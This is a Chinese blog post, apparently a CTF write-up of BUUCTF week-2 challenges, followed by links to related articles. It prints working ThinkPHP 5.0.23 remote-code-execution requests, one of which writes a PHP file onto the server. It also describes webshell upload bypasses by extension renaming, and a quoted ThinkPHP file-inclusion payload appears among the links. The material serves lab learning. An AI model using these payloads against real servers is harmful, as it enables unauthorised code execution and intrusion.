BUU刷题 WEEK2

最新推荐文章于 2022-10-03 15:12:36 发布
最新推荐文章于 2022-10-03 15:12:36 发布
阅读量312 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/carol2358/article/details/110871056
版权

文章目录

WEB:[ACTF2020 新生赛]Upload

在这里插入图片描述
上传文件
只能上传图像
传一个test.jpg,里面的内容:
在这里插入图片描述

在这里插入图片描述
后缀改成phtml
在这里插入图片描述
菜刀连接
在这里插入图片描述
在这里插入图片描述
flag
在这里插入图片描述

REAL:[ThinkPHP]5.0.23-Rce

原POC

POST /index.php?s=captcha HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

POST /index.php?s=captcha HTTP/1.1
Host: node3.buuoj.cn:26646
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 107

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo "<?php phpinfo(); ?>" > test.php

然后访问test.php, 拿到flag

RE:helloword

学习使用APKIDE和JEB
打开文件,搜索
在这里插入图片描述
JEB用这个打开
在这里插入图片描述
搜索ctrl+f
找到flag
在这里插入图片描述

Crypto: 丢失的MD5

修改成py3的格式,记得encode,然后运行,拿到flag
在这里插入图片描述

Basic:Upload-Labs-Linux

有点多,我单独开一篇吧,
这里就写一下第一个:
直接上传一个webshell,后缀改成.jpg,然后在burp suite里拦截,再把后缀改成.php,然后冰蝎连接就行

http://fb7539de-cfed-4648-9deb-4639fb7ba56b.node3.buuoj.cn/upload/shell.php

Misc:梅花香之苦寒来

挺麻烦,打死出题人
010打开,看到有很多数据
在这里插入图片描述
复制之后16进制转成ascii,
16进制转换:

https://www.sojson.com/hexadecimal.html

然后把替换一下( , ) ,
变成这样:
在这里插入图片描述
然后用gnuplot画出二维码
在这里插入图片描述
扫了之后得到flag
在这里插入图片描述
PWN:
继续魔芋

真岛忍
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
2. **理解控制流**:识别函数的入口和出口,理解基本块之间的跳转关系。 3. **分析操作码**:理解WASM指令集,识别关键操作,比如内存访问、算术运算、条件判断等。 4. **跟踪数据流**:追踪变量的分配和使用,找...
BUUCTF初学解题记录——Basic篇
u010152530的博客
05-04 5814
目录Linux LabBUU LFI COURSE 1Upload-Labs-LinuxBUU CODE REVIEW 1BUU BRUTE 1未完待续。。。 Linux Lab # 地址和端口为示例,需要更改为动态分配后的地址和端口 ssh root@node233.buuoj.cn -p 233 # 输入默认密码123456 cat /flag.txt # 输出flag: # flag{ef2a6029-xxxx-xxxx-xxxx-86fb808b12f2} # 一开始以为只要大括号的内容就行了。。。
thinkphp5的漏洞
https://www.cnblogs.com/zpchcbd/
04-10 1295
文件包含: http://ip/index.php?s=captcha&m=1 post提交: _method=__construct&filter[]=think__include_file&get[]=/home/www/test3/public/1.txt&method=get&server[]= 代码执行漏洞: http://bugbank.51vi...
BUUCTF刷题第二周
Qianzshuo的博客
10-04 936
第二周wireshakeasycap另一个世界被劫持的神秘礼物数据包中的线索 wireshak 题目给了提示,将下载的pcap丢到wireshark里面,发现 查看 得到flag easycap 打开压缩包发现是一个pcap,丢到wireshark中,追踪第一个包,直接得到flag 另一个世界 用winhex查看,发现最后有一串二进制,将其转换成ascii 被劫持的神秘礼物 pcapng文件,用wireshark打开,查看http包,根据提示将账号密码连接起来,然后md5加密 数据包中的线索 用 wires
BUUCTF NewStarCTF 公开赛赛道Week2 Writeup
末初的CSDN博客
10-03 2308
BUUCTF NewStarCTF 公开赛赛道Week2 Writeup
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
POSN:POSN-BUU的源代码
04-01
2. **模板和泛型编程**:为了提高代码的可复用性和效率,开发者可能会使用C++的模板,实现泛型容器和算法,如`std::vector`、`std::map`以及算法如`std::sort`。 3. **异常处理**:C++中的异常处理机制用于捕获和...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
05-26
在"BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)"这个挑战中,参赛者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
分包合同计量单.docx
07-13
分包合同计量单.docx
树莓派简介PPT课件.ppt
07-13
树莓派简介PPT课件.ppt
项目债务盘点明细表.docx
07-13
项目债务盘点明细表.docx
全网最热Python3入门+进阶 更快上手实际开发
最新发布
07-13
网最热Python3入门+进阶 更快上手实际开发 第1章 Python入门导学.mp4 239.6MB 第9章 高级部分:面向对象 第8章 Python函数 第7章 包、模块、函数与变量作用域 第6章 分支、循环、条件与枚举 第5章 变量与运算符 第4章 Python中表示“组”的概念与定义 第3章 理解什么是写代码与Python的基本类型 第2章 Python环境安装 第1章 Python入门导学 第14章 Pythonic与Python杂记 第13章 实战:原生爬虫 第12章 函数式编程: 匿名函数、高阶函数、装饰器
管理干部培训计划PPT模板
07-13
【作品名称】:管理干部培训计划PPT模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
黑色风格年终总结汇报PPT模板
07-13
【作品名称】:黑色风格年终总结汇报PPT模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
Java实训教程 Java软件开发实战 Java类库 第4章 集合操作 共31页.pptx
07-13
【课程大纲】 完整教程:https://download.csdn.net/download/qq_27595745/89538425 Java软件开发实战 Java类库 第1章 Object类 共29页.pptx Java软件开发实战 Java类库 第2章 字符串处理 共49页.pptx Java软件开发实战 Java类库 第3章 包装器类等 共40页.pptx Java软件开发实战 Java类库 第4章 集合操作 共31页.pptx Java软件开发实战 Java类库 第5章 io操作 共35页.pptx Java软件开发实战 Java类库 第6章 其它综合 共38页.pptx Java软件开发实战 Java类库 第7章 JDBC 共113页.pptx
红金商务风2024新征程再出发通用工作汇报PPT模板 (2)
07-13
【作品名称】:红金商务风2024新征程再出发通用PPT模板 (2) 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
红色商务风2023年终总结暨新年计划PPT模板
07-13
【作品名称】:红色商务风2023年终总结暨新年计划PPT模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
snort+base一个常用于构建入侵检测系统的解决方案.docx
07-13
Snort+Base是一个常用于构建入侵检测系统(IDS)的解决方案,其中Snort作为核心的检测引擎,而Base则是一个基于PHP的高效Snort分析查询系统。以下是对Snort+Base的详细介绍: 一、Snort概述 1. 定义与背景 Snort是美国Sourcefire公司开发的发布在GPL v2下的IDS(Intrusion Detection System)软件。自1998年由Martin Roesch用C语言开发以来,Snort已发展成为一个具有多平台、实时流量分析、网络IP数据包记录等特性的强大的网络入侵检测/防御系统(NIDS/NIPS)。 Snort支持多种操作系统,包括Windows、Linux、Solaris等,源代码和安装包可以从Snort官网获取。 2. 工作模式 Snort有三种主要的工作模式:嗅探器、数据包记录器、网络入侵检测系统模式。 嗅探器模式:仅仅是从网络上读取数据包并作为连续不断的流显示在终端上。 数据包记录器模式:把数据包记录到硬盘上。 网络入侵检测系统模式:分析网络数据流以匹配用户定义的一些规则,并根据检测结果采取一定的动作。这是Sno
buu cipher
10-23
Buu Cipher 的加密过程可以简单地分为两个步骤:混淆和扩散。 首先,混淆步骤使用一个密钥和置换表对明文进行置换。置换表是由密钥生成的,用于打乱明文中字符的顺序。这样,原本明文中相邻的字符将被分散到密文中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值